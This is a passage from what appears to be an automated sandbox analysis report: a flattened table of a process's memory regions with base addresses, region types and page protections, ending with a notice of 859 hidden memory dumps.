|
heap default
|
page read and write
|
||
354F000
|
unkown
|
page read and write
|
||
350000
|
heap default
|
page read and write
|
||
1D107000
|
unkown
|
page read and write
|
||
12EE2000
|
unkown
|
page read and write
|
||
2A0000
|
heap default
|
page read and write
|
||
F0000
|
unkown
|
page write copy
|
||
260000
|
heap private
|
page read and write
|
||
3B4000
|
heap private
|
page read and write
|
||
7EFDF000
|
unkown
|
page read and write
|
||
8A000
|
stack
|
page read and write
|
||
7FF001B0000
|
unkown
|
page read and write
|
||
2C0000
|
heap private
|
page read and write
|
||
90000
|
unkown
|
page readonly
|
||
2C70000
|
unkown
|
page readonly
|
||
2030000
|
unkown
|
page readonly
|
||
320000
|
unkown
|
page readonly
|
||
210000
|
unkown
|
page execute and read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
2720000
|
unkown
|
page read and write
|
||
37D000
|
heap default
|
page read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
697000
|
heap default
|
page read and write
|
||
732000
|
heap default
|
page read and write
|
||
5A8000
|
heap private
|
page read and write
|
||
22E0000
|
unkown
|
page readonly
|
||
364000
|
heap default
|
page read and write
|
||
7D0000
|
unkown
|
page readonly
|
||
2250000
|
unkown
|
page readonly
|
||
3555000
|
unkown
|
page read and write
|
||
20A0000
|
unkown
|
page readonly
|
||
1BCBE000
|
unkown
|
page read and write
|
||
1FB000
|
unkown
|
page read and write
|
||
2194000
|
heap private
|
page read and write
|
||
2C6000
|
unkown
|
page read and write
|
||
7FF00032000
|
unkown
|
page execute and read and write
|
||
10023000
|
unkown
|
page execute and read and write
|
||
26BE000
|
unkown
|
page read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
1F27000
|
heap private
|
page read and write
|
||
1D144000
|
unkown
|
page read and write
|
||
5C0000
|
heap private
|
page read and write
|
||
9C000
|
stack
|
page read and write
|
||
480000
|
heap default
|
page read and write
|
||
1D10000
|
unkown
|
page readonly
|
||
410000
|
heap private
|
page read and write
|
||
1D06E000
|
unkown
|
page read and write
|
||
377000
|
heap default
|
page read and write
|
||
1B66E000
|
unkown
|
page read and write
|
||
120000
|
unkown
|
page readonly
|
||
640000
|
unkown
|
page readonly
|
||
2C0E000
|
stack
|
page read and write
|
||
2720000
|
unkown
|
page read and write
|
||
310000
|
unkown
|
page read and write
|
||
60D000
|
heap default
|
page read and write
|
||
470000
|
unkown
|
page readonly
|
||
20000
|
unkown
|
page readonly
|
||
D0000
|
unkown
|
page readonly
|
||
90000
|
unkown
|
page readonly
|
||
1D7BE000
|
unkown
|
page read and write
|
||
357B000
|
unkown
|
page read and write
|
||
268E000
|
stack
|
page read and write
|
||
100000
|
unkown
|
page read and write
|
||
7FF001F7000
|
unkown
|
page read and write
|
||
2B3E000
|
unkown
|
page read and write
|
||
534000
|
heap default
|
page read and write
|
||
20000
|
unkown
|
page readonly
|
||
21C2000
|
heap private
|
page read and write
|
||
1BB09000
|
heap private
|
page read and write
|
||
1B64C000
|
unkown
|
page read and write
|
||
320000
|
unkown
|
page readonly
|
||
7EFDF000
|
unkown
|
page read and write
|
||
1C0000
|
unkown
|
page read and write
|
||
282E000
|
stack
|
page read and write
|
||
AD0000
|
heap private
|
page read and write
|
||
9C000
|
stack
|
page read and write
|
||
2CAE000
|
unkown
|
page read and write
|
||
690000
|
heap default
|
page read and write
|
||
7FF000E0000
|
unkown
|
page read and write
|
||
750000
|
unkown
|
page readonly
|
||
1D0DB000
|
unkown
|
page read and write
|
||
1C82E000
|
unkown
|
page read and write
|
||
2720000
|
unkown
|
page read and write
|
||
211000
|
unkown
|
page execute and read and write
|
||
60000
|
unkown
|
page readonly
|
||
2D20000
|
unkown
|
page write copy
|
||
20000
|
heap private
|
page read and write
|
||
2727000
|
unkown
|
page readonly
|
||
110000
|
unkown
|
page read and write
|
||
1D4000
|
heap private
|
page read and write
|
||
10021000
|
unkown
|
page execute and read and write
|
||
260000
|
unkown
|
page readonly
|
||
1D10000
|
unkown
|
page readonly
|
||
281000
|
unkown
|
page execute and read and write
|
||
1D062000
|
unkown
|
page read and write
|
||
2330000
|
unkown
|
page readonly
|
||
312000
|
heap private
|
page read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
7FF000FA000
|
unkown
|
page execute and read and write
|
||
287000
|
heap default
|
page read and write
|
||
2202000
|
heap private
|
page read and write
|
||
20F0000
|
unkown
|
page readonly
|
||
1CE67000
|
unkown
|
page readonly
|
||
2210000
|
heap private
|
page read and write
|
||
7EFDF000
|
unkown
|
page read and write
|
||
1B5E2000
|
unkown
|
page read and write
|
||
12D41000
|
unkown
|
page read and write
|
||
120000
|
heap default
|
page read and write
|
||
212E000
|
unkown
|
page read and write
|
||
1CB73000
|
heap private
|
page read and write
|
||
2720000
|
unkown
|
page read and write
|
||
2AFD000
|
unkown
|
page read and write
|
||
110000
|
heap default
|
page read and write
|
||
28B000
|
heap default
|
page read and write
|
||
870000
|
unkown
|
page readonly
|
||
1B64C000
|
unkown
|
page read and write
|
||
276E000
|
unkown
|
page read and write
|
||
140000
|
heap private
|
page read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
2C31000
|
unkown
|
page read and write
|
||
20000
|
heap private
|
page read and write
|
||
100000
|
unkown
|
page read and write
|
||
7EFDF000
|
unkown
|
page read and write
|
||
2720000
|
unkown
|
page read and write
|
||
64D000
|
heap default
|
page read and write
|
||
356B000
|
unkown
|
page read and write
|
||
1AC90000
|
unkown
|
page read and write
|
||
634000
|
heap default
|
page read and write
|
||
6A3000
|
heap default
|
page read and write
|
||
20000
|
unkown
|
page readonly
|
||
638000
|
heap default
|
page read and write
|
||
201B000
|
heap private
|
page read and write
|
||
1EE000
|
heap default
|
page read and write
|
||
1EE0000
|
unkown
|
page read and write
|
||
1B440000
|
unkown
|
page read and write
|
||
5D0000
|
heap default
|
page read and write
|
||
7AD000
|
unkown
|
page read and write
|
||
2720000
|
unkown
|
page read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
1B61E000
|
unkown
|
page read and write
|
||
3430000
|
unkown
|
page read and write
|
||
1D57000
|
unkown
|
page readonly
|
||
1A0000
|
unkown
|
page readonly
|
||
261000
|
unkown
|
page execute and read and write
|
||
D0000
|
unkown
|
page readonly
|
||
39D000
|
heap default
|
page read and write
|
||
100000
|
unkown
|
page read and write
|
||
3385000
|
unkown
|
page read and write
|
||
770000
|
heap private
|
page read and write
|
||
403000
|
unkown
|
page read and write
|
||
30E000
|
unkown
|
page read and write
|
||
8BE000
|
unkown
|
page read and write
|
||
10021000
|
unkown
|
page execute and read and write
|
||
1D080000
|
unkown
|
page read and write
|
||
1D06A000
|
unkown
|
page read and write
|
||
AD0000
|
heap private
|
page read and write
|
||
20C7000
|
unkown
|
page readonly
|
||
12C5C000
|
unkown
|
page read and write
|
||
1D100000
|
unkown
|
page read and write
|
||
3653000
|
unkown
|
page read and write
|
||
1EF7000
|
unkown
|
page readonly
|
||
3B0000
|
heap private
|
page read and write
|
||
D0000
|
unkown
|
page readonly
|
||
140000
|
unkown
|
page read and write
|
||
28EC000
|
unkown
|
page read and write
|
||
1D187000
|
unkown
|
page read and write
|
||
2450000
|
unkown
|
page read and write
|
||
35EB000
|
unkown
|
page read and write
|
||
1D081000
|
unkown
|
page read and write
|
||
5A0000
|
heap private
|
page read and write
|
||
800000
|
heap private
|
page read and write
|
||
640000
|
unkown
|
page readonly
|
||
450000
|
heap default
|
page read and write
|
||
1CB3B000
|
unkown
|
page read and write
|
||
1E70000
|
unkown
|
page write copy
|
||
7E0000
|
heap private
|
page read and write
|
||
2B50000
|
heap private
|
page execute and read and write
|
||
1C8A0000
|
heap private
|
page read and write
|
||
20000
|
unkown
|
page readonly
|
||
3B0000
|
unkown
|
page readonly
|
||
4B7000
|
heap default
|
page read and write
|
||
2B9A000
|
unkown
|
page read and write
|
||
224000
|
heap default
|
page read and write
|
||
1D07E000
|
unkown
|
page read and write
|
||
120000
|
unkown
|
page readonly
|
||
19C000
|
unkown
|
page read and write
|
||
780000
|
unkown
|
page readonly
|
||
7BF000
|
unkown
|
page read and write
|
||
60000
|
unkown
|
page readonly
|
||
2D20000
|
heap private
|
page read and write
|
||
2460000
|
unkown
|
page readonly
|
||
1B300000
|
unkown
|
page read and write
|
||
470000
|
unkown
|
page readonly
|
||
2B1000
|
unkown
|
page execute and read and write
|
||
21E0000
|
heap private
|
page read and write
|
||
1B640000
|
unkown
|
page read and write
|
||
110000
|
unkown
|
page readonly
|
||
3C0000
|
unkown
|
page readonly
|
||
10023000
|
unkown
|
page execute and read and write
|
||
690000
|
heap default
|
page read and write
|
||
2ED000
|
unkown
|
page read and write
|
||
1B4EE000
|
unkown
|
page read and write
|
||
7FF000F0000
|
unkown
|
page read and write
|
||
20000
|
unkown
|
page readonly
|
||
140000
|
unkown
|
page read and write
|
||
1E0000
|
unkown
|
page readonly
|
||
272C000
|
unkown
|
page readonly
|
||
2D0000
|
heap default
|
page read and write
|
||
2720000
|
unkown
|
page read and write
|
||
90000
|
unkown
|
page readonly
|
||
26CD000
|
unkown
|
page read and write
|
||
347000
|
heap default
|
page read and write
|
||
274B000
|
unkown
|
page readonly
|
||
15E000
|
heap default
|
page read and write
|
||
21A0000
|
heap private
|
page read and write
|
||
1EF7000
|
unkown
|
page readonly
|
||
20F0000
|
unkown
|
page readonly
|
||
297D000
|
unkown
|
page read and write
|
||
1D06F000
|
unkown
|
page read and write
|
||
26D0000
|
unkown
|
page readonly
|
||
80E000
|
unkown
|
page read and write
|
||
10021000
|
unkown
|
page execute and read and write
|
||
10023000
|
unkown
|
page execute and read and write
|
||
570000
|
unkown
|
page readonly
|
||
5C7000
|
heap private
|
page read and write
|
||
34F4000
|
unkown
|
page read and write
|
||
2820000
|
unkown
|
page readonly
|
||
330000
|
unkown
|
page readonly
|
||
704000
|
heap default
|
page read and write
|
||
660000
|
heap default
|
page read and write
|
||
2720000
|
unkown
|
page read and write
|
||
1CA8E000
|
unkown
|
page read and write
|
||
3B0000
|
heap default
|
page read and write
|
||
1FE0000
|
heap private
|
page read and write
|
||
3A89000
|
unkown
|
page read and write
|
||
2B10000
|
heap private
|
page execute and read and write
|
||
2E0000
|
unkown
|
page read and write
|
||
457000
|
heap default
|
page read and write
|
||
1B582000
|
unkown
|
page read and write
|
||
2A5E000
|
unkown
|
page read and write
|
||
160000
|
heap private
|
page read and write
|
||
4A0000
|
unkown
|
page readonly
|
||
26B000
|
stack
|
page read and write
|
||
100000
|
unkown
|
page read and write
|
||
1F0000
|
unkown
|
page execute and read and write
|
||
2520000
|
unkown
|
page read and write
|
||
B00000
|
heap private
|
page read and write
|
||
3F6000
|
unkown
|
page read and write
|
||
2B3000
|
unkown
|
page execute and read and write
|
||
1D11F000
|
unkown
|
page read and write
|
||
271E000
|
unkown
|
page read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
1D10000
|
unkown
|
page readonly
|
||
1B63D000
|
unkown
|
page read and write
|
||
820000
|
heap private
|
page read and write
|
||
2E4000
|
heap default
|
page read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
353C000
|
unkown
|
page read and write
|
||
10021000
|
unkown
|
page execute and read and write
|
||
6DC000
|
heap default
|
page read and write
|
||
90000
|
unkown
|
page readonly
|
||
470000
|
heap default
|
page read and write
|
||
281F000
|
unkown
|
page read and write
|
||
20000
|
unkown
|
page readonly
|
||
67E000
|
unkown
|
page read and write
|
||
620000
|
heap default
|
page read and write
|
||
7FF00160000
|
unkown
|
page read and write
|
||
110000
|
unkown
|
page read and write
|
||
2280000
|
unkown
|
page readonly
|
||
10023000
|
unkown
|
page execute and read and write
|
||
1F1000
|
unkown
|
page execute and read and write
|
||
10021000
|
unkown
|
page execute and read and write
|
||
2F2000
|
heap default
|
page read and write
|
||
7FF00210000
|
unkown
|
page execute and read and write
|
||
36E000
|
unkown
|
page read and write
|
||
7EFDF000
|
unkown
|
page read and write
|
||
220000
|
unkown
|
page execute and read and write
|
||
20F0000
|
unkown
|
page read and write
|
||
460000
|
unkown
|
page readonly
|
||
7FF001D0000
|
unkown
|
page read and write
|
||
263000
|
unkown
|
page execute and read and write
|
||
35F2000
|
unkown
|
page read and write
|
||
1B66E000
|
unkown
|
page read and write
|
||
277E000
|
stack
|
page read and write
|
||
140000
|
unkown
|
page read and write
|
||
3565000
|
unkown
|
page read and write
|
||
AA0000
|
heap private
|
page read and write
|
||
9E0000
|
heap private
|
page read and write
|
||
10021000
|
unkown
|
page execute and read and write
|
||
D0000
|
unkown
|
page read and write
|
||
2C7000
|
heap default
|
page read and write
|
||
7FF00220000
|
unkown
|
page read and write
|
||
6C0000
|
unkown
|
page readonly
|
||
1B0000
|
unkown
|
page execute and read and write
|
||
2F0000
|
heap private
|
page read and write
|
||
2480000
|
unkown
|
page readonly
|
||
A90000
|
unkown
|
page readonly
|
||
2C9C000
|
unkown
|
page read and write
|
||
7FF002A0000
|
unkown
|
page execute and read and write
|
||
2780000
|
unkown
|
page readonly
|
||
1EF7000
|
unkown
|
page readonly
|
||
27BE000
|
unkown
|
page read and write
|
||
13B000
|
unkown
|
page read and write
|
||
2B90000
|
unkown
|
page read and write
|
||
31A9000
|
unkown
|
page read and write
|
||
2DCE000
|
unkown
|
page read and write
|
||
352C000
|
unkown
|
page read and write
|
||
1D080000
|
unkown
|
page read and write
|
||
2210000
|
unkown
|
page readonly
|
||
580000
|
unkown
|
page readonly
|
||
7EFDF000
|
unkown
|
page read and write
|
||
7FF00270000
|
unkown
|
page read and write
|
||
45D000
|
heap default
|
page read and write
|
||
7EFDF000
|
unkown
|
page read and write
|
||
3B72000
|
unkown
|
page read and write
|
||
2DEF000
|
stack
|
page read and write
|
||
7FF00030000
|
unkown
|
page read and write
|
||
2A0000
|
unkown
|
page read and write
|
||
27DE000
|
unkown
|
page read and write
|
||
160000
|
unkown
|
page readonly
|
||
10023000
|
unkown
|
page execute and read and write
|
||
2240000
|
heap private
|
page read and write
|
||
2720000
|
unkown
|
page read and write
|
||
2B00000
|
unkown
|
page read and write
|
||
D0000
|
unkown
|
page readonly
|
||
2720000
|
unkown
|
page read and write
|
||
283000
|
unkown
|
page execute and read and write
|
||
1D0FC000
|
unkown
|
page read and write
|
||
15B000
|
unkown
|
page read and write
|
||
150000
|
heap default
|
page read and write
|
||
24E0000
|
unkown
|
page readonly
|
||
20F7000
|
unkown
|
page readonly
|
||
263F000
|
stack
|
page read and write
|
||
38D000
|
unkown
|
page read and write
|
||
1CE0000
|
unkown
|
page readonly
|
||
330000
|
heap private
|
page read and write
|
||
1E0000
|
unkown
|
page read and write
|
||
7FF001E0000
|
unkown
|
page execute and read and write
|
||
2D0D000
|
stack
|
page read and write
|
||
185000
|
unkown
|
page read and write | page guard
|
||
2770000
|
unkown
|
page write copy
|
||
1B61E000
|
unkown
|
page read and write
|
||
2740000
|
heap private
|
page read and write
|
||
2720000
|
unkown
|
page read and write
|
||
738000
|
heap default
|
page read and write
|
||
380000
|
heap private
|
page read and write
|
||
2C1E000
|
unkown
|
page read and write
|
There are 859 hidden memdumps, click here to show them.